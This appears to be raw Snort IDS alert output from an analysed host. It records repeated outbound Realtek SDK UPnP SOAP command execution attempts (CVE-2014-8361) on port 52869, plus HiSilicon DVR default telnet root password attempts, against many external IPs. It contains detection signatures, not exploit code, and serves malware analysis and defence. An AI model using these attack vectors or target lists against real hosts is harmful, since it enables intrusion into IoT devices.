Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52388 -> 45.43.229.232:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52388 -> 45.43.229.232:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48904 -> 185.203.230.44:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48904 -> 185.203.230.44:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:32876
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48908 -> 185.203.230.44:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53576 -> 45.248.71.82:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53576 -> 45.248.71.82:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:32876 -> 211.106.163.145:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48950 -> 185.203.230.44:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48950 -> 185.203.230.44:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48956 -> 185.203.230.44:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:32876
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:48624 -> 186.72.40.225:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35714 -> 45.43.239.164:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35714 -> 45.43.239.164:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:35248 -> 12.45.41.169:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 186.72.40.225:23 -> 192.168.2.23:48624
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 186.72.40.225:23 -> 192.168.2.23:48624
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35248
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35248
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58452 -> 185.245.0.220:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58452 -> 185.245.0.220:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54954 -> 45.121.82.127:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54954 -> 45.121.82.127:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39512 -> 45.42.82.57:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39512 -> 45.42.82.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55490 -> 45.33.240.207:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55490 -> 45.33.240.207:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33012
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36620 -> 91.77.162.185:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36620 -> 91.77.162.185:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36624 -> 91.77.162.185:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43688 -> 45.123.198.127:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43688 -> 45.123.198.127:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:33012 -> 211.106.163.145:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49968 -> 45.33.243.183:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49968 -> 45.33.243.183:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41516 -> 45.43.226.236:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41516 -> 45.43.226.236:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:51282 -> 212.27.0.202:23
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:57766 -> 181.192.57.218:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53568 -> 45.33.255.34:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53568 -> 45.33.255.34:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33012
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35390
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35390
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50284 -> 45.115.236.159:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50284 -> 45.115.236.159:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50308 -> 45.115.236.159:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 37.85.164.81:23 -> 192.168.2.23:50880
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41356 -> 91.77.238.72:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41356 -> 91.77.238.72:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41358 -> 91.77.238.72:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 125.139.34.17:23 -> 192.168.2.23:44166
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 125.139.34.17:23 -> 192.168.2.23:44166
Source: Traffic	Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33152
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35384 -> 185.235.183.65:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35384 -> 185.235.183.65:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35484 -> 185.235.183.65:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55468 -> 45.84.91.165:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55468 -> 45.84.91.165:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55476 -> 45.84.91.165:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40568 -> 45.152.216.51:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40568 -> 45.152.216.51:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 212.27.0.202:23 -> 192.168.2.23:51282
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 212.27.0.202:23 -> 192.168.2.23:51282
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49550
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44976 -> 45.113.0.188:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44976 -> 45.113.0.188:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33152
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51096 -> 91.200.123.41:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48824 -> 45.127.160.101:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48824 -> 45.127.160.101:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49550
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49550
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49600
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 37.85.164.81:23 -> 192.168.2.23:50880
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 37.85.164.81:23 -> 192.168.2.23:50880
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55428 -> 185.245.0.231:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55428 -> 185.245.0.231:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45612 -> 91.78.111.19:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45612 -> 91.78.111.19:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59048 -> 45.84.90.224:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59048 -> 45.84.90.224:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45624 -> 91.78.111.19:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49600
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49600
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59060 -> 45.84.90.224:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41378 -> 45.126.229.132:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41378 -> 45.126.229.132:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33282
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35584
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35584
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60078 -> 91.77.143.236:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60078 -> 91.77.143.236:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50132 -> 185.184.220.115:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50132 -> 185.184.220.115:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49646
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54010 -> 45.133.119.139:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54010 -> 45.133.119.139:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:49646 -> 182.71.126.190:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60082 -> 91.77.143.236:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49646
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49646
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33282
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44352 -> 91.200.121.29:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49712
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35318 -> 91.77.125.100:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35318 -> 91.77.125.100:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35322 -> 91.77.125.100:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37108 -> 45.153.166.108:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37108 -> 45.153.166.108:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37110 -> 45.153.166.108:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49712
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49712
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49752
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50044 -> 45.142.152.184:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50044 -> 45.142.152.184:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33428
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45504 -> 45.43.231.213:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45504 -> 45.43.231.213:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58168 -> 45.43.234.114:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58168 -> 45.43.234.114:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43210 -> 45.120.184.152:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43210 -> 45.120.184.152:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45512 -> 45.43.231.213:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:44530 -> 125.139.34.17:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47226 -> 91.76.179.163:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47226 -> 91.76.179.163:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47268 -> 91.76.179.163:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43218 -> 45.120.184.152:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34880 -> 45.115.242.28:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34880 -> 45.115.242.28:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49752
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49752
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48016 -> 45.248.71.254:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48016 -> 45.248.71.254:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51472 -> 185.241.254.137:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51472 -> 185.241.254.137:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49822
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51476 -> 185.241.254.137:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42706 -> 45.84.90.111:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42706 -> 45.84.90.111:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47392 -> 185.245.0.24:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47392 -> 185.245.0.24:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42746 -> 45.84.90.111:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56442 -> 45.57.247.12:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56442 -> 45.57.247.12:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56468 -> 45.57.247.12:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33428
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35768
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35768
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49822
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49822
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54702 -> 91.200.121.128:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49852
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49852
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49852
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43050 -> 45.42.80.68:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43050 -> 45.42.80.68:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49898
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58184 -> 45.84.90.2:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58184 -> 45.84.90.2:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42416 -> 91.77.204.153:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42416 -> 91.77.204.153:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 37.85.164.81:23 -> 192.168.2.23:51292
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58196 -> 45.84.90.2:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42424 -> 91.77.204.153:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44940 -> 45.121.56.17:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44940 -> 45.121.56.17:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33552
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 125.139.34.17:23 -> 192.168.2.23:44530
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 125.139.34.17:23 -> 192.168.2.23:44530
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49898
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49898
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49956
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54128 -> 91.214.119.203:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54128 -> 91.214.119.203:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54132 -> 91.214.119.203:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36952 -> 45.153.8.233:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36952 -> 45.153.8.233:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33552
Source: Traffic	Snort IDS: 716 INFO TELNET access 46.229.140.197:23 -> 192.168.2.23:52150
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49956
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49956
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40856 -> 45.120.204.212:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40856 -> 45.120.204.212:52869
